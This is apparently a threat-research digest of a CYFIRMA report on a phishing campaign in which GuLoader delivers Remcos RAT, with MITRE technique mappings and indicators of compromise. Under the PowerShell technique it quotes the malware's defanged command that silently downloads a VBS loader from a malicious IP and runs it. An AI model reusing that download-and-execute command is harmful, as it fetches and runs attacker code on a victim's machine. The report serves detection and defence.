Threat Research

GuLoader Deploying Remcos RAT – CYFIRMA

Securonix

A CYFIRMA report details a phishing campaign that delivers GuLoader to download Remcos RAT via a heavily obfuscated VBScript loader. The operation uses PowerShell, LNK shortcuts, and in-memory process injection to establish C2 and persistence. #GuLoader #RemcosRAT #UNC045 #Leviathan #APT40 #SleeperCell #TICK

Keypoints

  • Malicious PDF delivered by email redirects to a cloud-based Mega.nz drive to download a password-protected ZIP.
  • Inside the ZIP is a shortcut (LNK) that uses PowerShell to download a heavily obfuscated VBS script (GuLoader) and execute it.
  • GuLoader injects into ieinstal.exe and establishes a connection to a hard-coded C2 server.
  • The campaign primarily delivers Remcos RAT and has been active since late 2022, with Chinese nation-state actors observed using Remcos and other malware in targeted campaigns.
  • Multiple URLs and a set of VBS payloads (skivesvamps.vbs, Filmist.vbs, Sacramentum.vbs) are hosted on a malicious IP, with several associated MD5 hashes and domain/URL indicators.
  • Campaigns show multi-stage deployment, registry persistence, and ongoing exfiltration/remote-control capabilities against a broad set of industries and geographies.
  • MITRE-aligned techniques include phishing, PowerShell and VB execution, registry persistence, obfuscation, registry discovery, and C2 via application-layer protocols and non-standard ports.

MITRE Techniques

  • [T1566] Phishing – The malicious PDF file is delivered via email to victim…
  • [T1059.001] PowerShell – The LNK executes a PowerShell command to download and run the VBS loader: “C[:]WindowsSystem32WindowsPowerShellv1.0powershell[.]exe -windowstyle hidden Invoke-WebRequest http[:]//194[.]180[.]48[.]211/lmp/skivesvamps.vbs -Outfile %temp%prof.vbs; Start-Process %temp%prof[.]vbs”
  • [T1059.006] Visual Basic – GuLoader uses Visual Basic Script (VBS) to deliver payloads and execute in memory; the VBS is heavily obfuscated.
  • [T1547.001] Registry Run Keys – Malware creates a registry entry at “HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun” for persistence.
  • [T1027.002] Obfuscated Files or Information – GuLoader uses a polymorphic shellcode loader; the shellcode is encrypted and heavily obfuscated to evade detection.
  • [T1012] Query Registry – The first stage VBS writes data into the registry (e.g., “HKEY_CURRENT_USERBrugerudgaveStudenterhuernes85Journalism”).
  • [T1082] System Information Discovery – part of the discovery/credentialing phase observed in the campaign’s tooling.
  • [T1071] Application Layer Protocol – The injected/runner process communicates with its C2 server over HTTP(S) protocols to fetch payloads.
  • [T1571] Non-Standard Port – C2 communications use non-standard ports (e.g., 4890) on IPs like 84.21.172.49:4890.

Indicators of Compromise

  • [MD5] – PDF File – FA29A3514315DAA300A2F51EFFED36B7, 7B458417E456EDFB8816B9F063DD7F4A, and 5 more hashes
  • [MD5] – skivesvamps.vbs / prof.vbs – 7B458417E456EDFB8816B9F063DD7F4A
  • [MD5] – DrWSIClDcaj128.psm – 4937FCED9860DEE34E4A62036D7EB3E4
  • [URL] – http://194.180.48.211/lmp/ (Invoke WebRequest to fetch VBS)
  • [URL] – http://194.180.48.211/tvic/
  • [URL] – http://194.180.48.211/Axel/
  • [Domain] – mega.nz – Cloud drive used to host the ZIP and related files
  • [IP] – 194.180.48.211 – Malicious distribution/download host
  • [IP] – 178.237.33.50 – Connection target (Remcos C2)
  • [IP:Port] – 45.81.39.21:28465 – C2
  • [IP:Port] – 84.21.172.49:4890 – C2
  • [IP:Port] – 37.0.14.209:6299 – C2
  • [File Name] – Purchase Order.zip ( ZIP file found on Mega.nz)
  • [File Name] – ieinstal.exe (Injected process that connects to C2)
  • [File Name] – Purchase Order.pdf (LNK target)

Read more: https://www.cyfirma.com/outofband/guloader-deploying-remcos-rat/